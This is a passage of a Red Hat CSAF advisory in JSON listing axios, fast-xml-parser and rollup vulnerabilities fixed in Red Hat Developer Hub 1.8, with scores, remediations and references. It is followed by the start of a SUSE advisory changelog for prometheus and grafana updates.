"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25896",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-02-20T22:01:59.622413+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441501"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has been assessed as IMPORTANT for Red Hat products. This vulnerability arises when the parsed XML output is subsequently rendered to users which requires the interaction of the user. The impact of this flaw is also limited to the user\u0027s browser context.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "RHBZ#2441501",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441501"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25896",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25896"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2"
}
],
"release_date": "2026-02-20T20:57:48.074000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling"
},
{
"cve": "CVE-2026-26278",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-19T21:03:33.363864+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441120"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "RHBZ#2441120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26278",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26278"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj"
}
],
"release_date": "2026-02-19T19:40:55.842000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-27942",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-26T03:01:53.367202+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442938"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The flaw affects the XML builder component of the fast-xml-parser library and is triggered only when the preserveOrder option is explicitly enabled. In Red Hat\u2013shipped configurations, this option is not enabled by default, and the vulnerable code path is therefore not exercised under typical deployments.\nThe underlying issue results in uncontrolled recursion leading to a stack overflow condition, which causes the application to terminate unexpectedly. While this can be triggered via crafted input, the impact is limited strictly to denial of service (DoS) and does not provide a mechanism for arbitrary code execution, privilege escalation, or data disclosure.\nFurthermore, exploitation requires that the affected application processes attacker-controlled XML input through the XML builder functionality with the specific vulnerable configuration enabled. This significantly reduces the attack surface and introduces environmental constraints not considered in the generalized NVD scoring.\n\nGiven the absence of confidentiality and integrity impact, the requirement for non-default configuration, and the limitation of the impact to process termination, Red Hat considers the practical risk to be lower than the NVD assessment. As such, this issue is classified as Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "RHBZ#2442938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27942",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27942"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3"
}
],
"release_date": "2026-02-26T01:22:11.383000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, configure applications using the `fast-xml-parser` XML builder to set the `preserveOrder` option to `false`. Alternatively, ensure that all XML input data is thoroughly validated before being passed to the builder to prevent the processing of malicious or malformed content.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service"
}
]
}
SUSE-SU-2026:1148-1
Vulnerability from csaf_suse - Published: 2026-03-30 11:21 - Updated: 2026-03-30 11:21Summary
Security Beta update 5.2.0 Beta1 for Multi-Linux Manager Client Tools
Severity
Critical
Notes
Title of the patch: Security Beta update 5.2.0 Beta1 for Multi-Linux Manager Client Tools
Description of the patch: This update fixes the following issues:
golang-github-prometheus-prometheus:
- CVE-2026-27606: Fix arbitrary file write via path traversal in
rollup (bsc#1258893)
* Bump rollup to version 4.59.0
- Drop SLE 12 support (jsc#PED-15474)
- CVE-2026-25547: Fix unbounded brace range expansion leading to
excessive CPU and memory consumption (bsc#1257841):
* Bump brace-expansion to version 5.0.2
- Do not build old web UI. Fixes following security
vulnerabilities:
* CVE-2026-1615: jsonpath: arbitrary code injection due to unsafe
evaluation of user-supplied JSON Path expressions (bsc#1257897)
* CVE-2025-61140: jsonpath: the `value` function is vulnerable to
prototype pollution (bsc#1257442)
- Set source URL in the spec file and drop tar service
grafana:
- Drop support for SLE 12 (jsc#PED-15474)
- Update to version 11.6.11:
Features and enhancements:
* Alerting: Add limits for the size of expanded notification
templates
* Correlations: Remove support for org_id=0
Security:
* CVE-2026-21722: Public dashboards annotations: use dashboard
timerange if time selection disabled (bsc#1258136)
- Update to version 11.6.10:
* API: Add missing scope check on dashboards
* Avatar: Require sign-in, remove queue, respect timeout
Bug fixes:
* Alerting: Fix a race condition panic in ResetStateByRuleUID
- Update to version 11.6.9:
* Plugins: Add PluginContext to plugins when scenes is disabled
* Alerting: Fix contacts point issues
- Update to version 11.6.8:
* Alerting: Fix unmarshalling of GettableStatus to include time
intervals
- Update to version 11.6.7:
* Auth: Fix render user OAuth passthrough
* LDAP Authentication: Fix URL to propagate username context as
parameter
* Plugins: Dependencies do not inherit parent URL for preinstall
* URLParams: Stringify true values as key=true always (fixes
issues with variables with true value)
- Update to version 11.6.6:
* Alerting: Fix copying of recording rule fields
* Fix redirection after login when Grafana is served from subpath
- Update to version 11.6.5:
* Alerting: Bump alerting package to include change to
NewTLSClient
- Update to version 11.6.4:
* StateTimeline: Add endTime to tooltip
* Unified storage: Respect GF_DATABASE_URL override
